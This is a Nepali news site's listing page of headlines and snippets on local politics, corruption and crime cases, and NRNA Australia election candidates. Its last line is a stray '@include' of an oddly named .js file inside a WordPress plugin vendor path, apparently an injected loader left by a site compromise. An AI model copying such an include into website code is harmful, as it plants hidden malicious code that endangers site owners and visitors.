समाचार

भावनालाई घुस लिएको आरोप लाग्यो अनि राजीनामा गरिन्

काठमाडौं– २ लाख रुपैंया घुस लिएको आरोप लागेपछि जनप्रतिनिधि भावना श्रेष्ठले राजीनामा गरेकी छन्। पोखरा महानगरपालिकाको न्यायीक समितिबाट उनले राजीनामा गरेकी हुन्। पोखरा वडा नम्बर २६ को विजयपुर स्थित घडेरीको विवाद मिलाइदिने भन्दै श्रेष्ठले २ लाख लिएको सार्वजनिक भएको थियो। उनी पोखरा–९ की वडा सदस्य हुन्। रुपा गाउँपालिकाका कर्मचारी रविनकुमार…

मुस्ताङमा प्रचण्ड

काठमाडौं– प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ ले कोरला नाका, मुक्तिनाथ मन्दिर र कागबेनीको अवलोकन गरेका छन्। उनी बिहानै मुस्ताङ पुगेका हुन्। राष्ट्रिय प्रकृति संरक्षण कोषअन्तर्गतको अन्नपूर्ण संरक्षण क्षेत्र आयोजना (एक्याप)ले आयोजना गरेको जलवायु परिवर्तनसम्बन्धी अन्तक्रिया कार्यक्रममा सहभागी हुन प्रचण्ड बिहानै मुस्ताङ गएका हुन्। नेपाली सेनाको हेलिकोप्टरमार्फत प्रधानमन्त्री मुस्ताङ पुगेका मुस्ताङका प्रमुख…

इन्जिनियर पोखरेल प्रहरी नियन्त्रणमा, उच्च अदालतले दिएको थियो पक्राउ नगर्न अन्तरिम आदेश

काठमाडौं– मध्य पहाडी लोकमार्गका आयोजना निर्देशक हरिकुमार पोखरेललाई प्रहरीले नियन्त्रणमा लिएको छ। जबरजस्ती करणीको आरोपमा पोखरेल त्रिपुरेश्वरबाट प्रहरीको नियन्त्रणमा लिइएको प्रहरीले जनाएको छ। बलात्कार आरोप लागेपछि पोखरेल मध्यपहाडी लोकमार्ग आयोजना कार्यालयबाटै सम्पर्कविहीन भएको बताइन्छ। तर, उनलाई उच्च अदालत पाटनले पक्राउ नगर्नका लागि अन्तरिम आदेश दिएको थियो। न्यायाधीश जनक पाण्डेको एकल…

विद्यार्थीको ‘रगत चुस्ने’ कांग्रेस सांसदले मागे दुई मन्त्रीको राजीनामा, संसदमा कफन कहिले बाँध्ने?

काठमाडौं– डाक्टर पढ्ने नेपाली विद्यार्थीलाई दबाबमा राख्ने नेपाली कांग्रेसको सांसद सुनिल शर्माले गृहमन्त्री नारायणकाजी श्रेष्ठ र अर्थमन्त्री प्रकाशशरण महतको राजीनामा माग गरेका छन्। राजीनामा नगरे कफन बाँधेर संसदमा बस्ने घोषणा गरेका उनले प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्ड फर्केपछि अनशन बस्ने चेतावनी दिए। सुन प्रकरणको अनुसन्धानमा सघाउनका लागि गृहमन्त्री र अर्थमन्त्रीले राजीनामा…

एनआरएनए अस्ट्रेलिया चुनावः युवा पुस्ताबीच पौडेलले पक्रिएको पदचाप

सिड्नी– भनिन्छ नि– युवावस्थामा हामी सिक्छौं; उमेर मा हामी बुझ्छौं। सिक्ने र सिकाईको लयलाई गति दिइरहेका छन्, अस्ट्रेलियाको न्युकास्टलवासी प्रवेश पौडेल। युवा शक्ति सम्पूर्ण विश्वको साझा धन भनेजस्तै उनी गैर आवासीय नेपाली संघ (एनआरएनए) अस्ट्रेलियाका एक ‘कोहिनुर’ बन्ने गतिमा छन्। अध्ययन, अनुभव र योदानका हिसाबमा उनको यो यात्रा संस्थागत रुपले…

संकल्पमा समर्पित रोजी पन्तः एनआरएन अस्ट्रेलिया चुनावमा उडान भरेकी नारी

सिड्नी– नारीका सन्दर्भमा एउटा अन्तर्राष्ट्रिय भनाई छ– म खाजा खाने होइन, सधैं काम गर्ने महिला बन्न चाहन्छु। यहि भनाईको पयार्य हुन् अस्ट्रेलियाको न्युक्यास्टलबासी रोजी पन्त। संकल्प र पारदर्शीतामा विश्वसनीय पात्र हुन्छन् नारी। यसैले पनि पन्तलाई २९ जुलाईमा हुने निर्वाचनमा अनिल पोखरेलको नेतृत्वमा मैदानमा उत्रिने समूहले सह–कोषाध्यक्षको बलियो उम्मेदवार बनाएको छ।…

एनआरएनए अस्ट्रेलिया चुनावः समुदायमा योगदान गर्न मैदानमा उत्रिएका ‘सेतो घोडा’

सिड्नी– १६ बर्षअघि अस्ट्रेलिया प्रवेश गर्दा डम्बर अर्थात् अमर रसाइली समुदायका एक सदस्य थिए। नेपाली समुदायमा संघर्ष गर्दै न्युक्यास्टलमा एउटा व्यावसायीक नाम खडा गरेका उनी अब समुदायका लागि मात्र नभई देशका लागि पनि योगदान गर्ने लयमा उत्रिएका छन्। अर्थात्, उनी आगामी २९ जुलाईमा हुने गैर आवासीय नेपाली संघ (एनआरएनए) अस्ट्रेलियाको…

माओवादीमा विप्लव भित्राउने योजनाकार महराविरुद्ध जनार्दशन–बर्षमान, सुरु भयो मिडिया प्रहार

काठमाडौं– चिनियाँ सुन तस्करसँग नेकपा माओवादी केन्द्रका प्रवक्ता तथा पूर्वसभामुख कृष्णबहादुर महरा र उनका छोरा राहुल महराको कनेक्शन भेटिएको समाचारमा राजनीतिक दुराग्रह समेत जोडिएको विश्लेषण गरिएको छ। भेपमार्फत सुन तस्करी प्रकरणमा संलग्न चिनियाँ व्यापारी समेत रहेका तस्करसँग नेकपा माओवादी केन्द्रका नेता तथा पूर्वसभामुख कृष्णबहादुर महरा र उनका छोरा राहुल महराको…

एनआरएनए चुनाव अस्ट्रेलियाः उपाध्यक्षसहित एनएसडब्ल्यु संयोजकमा सन्ध्याको उम्मेदवारी घोषणा

सिड्नी– १४ बर्षसम्म अस्ट्रेलियामा संघर्ष गरिरहेकी सन्ध्या शाहले गैर आवासीय नेपाली संघ (एनआरएनए) अस्ट्रेलियाको उपाध्यक्ष पदमा उम्मेदवारी दिने भएकी छन्। योसँगै उनले अत्यधिक नेपाली रहेको न्यु साउथ वेल्स राज्य संयोजकको पनि दाबेदारी प्रस्तुत गरेकी छन्। प्रजातान्त्रिक प्यानलबाट जुलाईको अन्तिमतिर हुन लागेको चुनावी मैदानमा उत्रिएकी शाह अहिले सचिव पदको जिम्मेवारीमा छिन्।…

गायक प्रकाश सपूतमाथि बियरको बोतल प्रहार

काठमाडौं– गायक प्रकाश सपूतमाथि कार्यक्रममा गीत गाइरहेका बेला बियरको बोतल प्रहार भएको छ। रोमानियामा प्रस्तुती दिइरहेका बेला उनलाई क्यान बियरको बोतलले प्रहार भएपछि कार्यक्रम केही समय बिथोलिएको थियो। सपूतले उक्त प्रहार छल्न भ्याएनन्। मदिरामा लठ्ठ भएका दर्शकले उनलाई प्रहार गरेको बताइन्छ।

सत्ता परिवर्तनको चर्चाः देउवा फर्किएपछि बन्ला त कांग्रेस–एमाले सरकार?

काठमाडौं– अहिलेको सत्ता गठबन्धन भत्काउँदै नेपाली कांग्रेसले आफ्नो नेतृत्वमा नेकपा एमालेलगायतको सहयोग लिएर सत्ता समीकरण परिवर्तन गर्ने चर्चा सुरु भएको छ। सत्तामा बार्गेनिङका लागि चार दल सम्मिलित समाजवादी मोर्चा घोषणा कांग्रेसलाई दबाब दिनका लागि भएको दाबी गरिएका बेला त्यसको एउटा घटक नेकपा एकीकृत समाजवादीका अध्यक्ष माधवकुमार नेपालले एमाले सरकार परिवर्तनको…

कतार आएका पत्रकार महासंघका नेता अहमदले राजदूत ढकालसँग राखे यस्ता जिज्ञासा

दोहा– नेपाल पत्रकार महासंघका केन्द्रीय सदस्य तथा अल्पसंख्यक विभाग प्रमुख इकबाल अहमदले कतारका लागि नेपाली राजदूत नरेश ढकाललाई भेटेर श्रमिक नेपाली मजदुरका समस्या समाधानका उपायबारे चर्चा गरेका छन्। राजदुतावासको कार्यालयमा ढकाललाई भेट गरी उनले नेपालीहरुको समस्या, दुवै देशको कानुनको प्रभावका कारण पर्न सक्ने कठिनाई सहजिकरणका सन्बन्धमा जिज्ञासा राखेका थिए। अहमदलाई…

अति संकटापन्न जन्तु संरक्षण सम्मेलन सौराहामा, आखिर के हो ढोँले वर्किङ ग्रुप?

काठमाडौं– वन्यजन्तु मोनिटरिङतर्फ के–कस्ता नयाँ प्रविधिको प्रयोग गर्नुपर्छ भन्ने सन्दर्भमा प्रोफेसर हिल कोबयाशीले आफ्ना कुराहरू राख्नेछन्। अर्जुन श्रीवास्तवले ‘रेड लिस्ट एसेसमेन्ट्स’गर्नेछन्। सम्मेलनमा मार्टिन गिल्बर्टले वन कुकुरलाई लाग्ने रोग र रोकथाममा उपायहरूबारे प्रस्तुति दिनेछन् भने सुजन खनालले मानव–वन कुकुर द्वन्द्वका कारण एवम् समाधानमा पाटाहरूलाई अगाडि सार्नेछन् । क्यानडीड स्पेसलिस्ट ग्रुप अन्तर्गतको…

इटहरीका सकडमानव उद्दारमा मेयर हेमकर्ण पौडेल सक्रिय

इटहरी– इटहरीका सडक मानवको उद्दारमा मेयर हेमकर्ण पौडेलसहितको उपमहानगरपालिकाको टोली सक्रिय भएको छ। इटहरी चोक तथा गल्लीहरुमा  बस्दै आएका उनीहरुको मध्यरातमा सुतिरहेकै ठाँउबाट उद्दार गरिएको सुरु गरिएको छ। बालबालिका, युवा तथा बृद्ध सडक मानवको उद्दार कार्य थालिएको हो। उनीहरुलाई मेयर पौडेल आफै रातभर इटहरीको गल्ली–गल्ली पुगेर उद्दार गरेका हुन ।…

असई हत्या प्रकरण छानबिन गर्न सशस्त्र एआईजी गौतम नेतृत्वको टोली खटियो

काठमाडौं– सशस्त्र प्रहरीका सहायक निरिक्षक (असई) सत्यनारायण यादव हत्या प्रकरणमा अतिरिक्त महानिरिक्षक (एआईजी) चन्द्रप्रकाश (सीपी) गौतमको टोली छानबिनका लागि खटिएको छ। नम्बर ६ हेडक्वार्टर राजविराजमा दरबन्दी भई बोर्डर आउट पोस्ट (बीओपी) छिन्नमस्तामा कार्यरत यादवको हत्या छानबिनमा गौतमको टोली खटाइएको हेडक्वार्टरले जनाएको छ। २० असोजमा नेपाल–भारत सीमाभन्दा ३ किलोमिटर भारततर्फ बिहार…

website design & develop by thakuricreation Pvt. Ltd.

@include "wp-content/plugins/ad-inserter/includes/google-api-8/vendor/composer/include/7025.js";